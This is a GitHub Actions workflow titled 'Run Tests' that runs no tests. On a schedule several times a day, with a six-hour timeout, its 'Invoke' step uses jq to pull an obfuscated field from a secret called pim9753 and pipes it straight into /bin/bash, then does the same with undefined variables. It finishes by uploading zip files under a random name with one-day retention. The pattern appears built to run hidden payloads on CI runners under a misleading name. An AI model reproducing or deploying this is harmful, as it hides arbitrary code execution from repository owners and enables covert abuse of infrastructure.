name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '20 3,9,15,21 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          pim9753: ${{ secrets.pim9753 }}
        run: |
          printf '%s' "$pim9753" | jq -r .ovjvk00761 | /bin/bash
          echo $i17 | jq -r .drfr1 | /bin/bash
          echo $nfgh71 | jq -r .evyk6 | /bin/bash
          echo $vyi0140 | jq -r .qahe3307 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: d1eX5kjr
          path: "*.zip"
          retention-days: 1
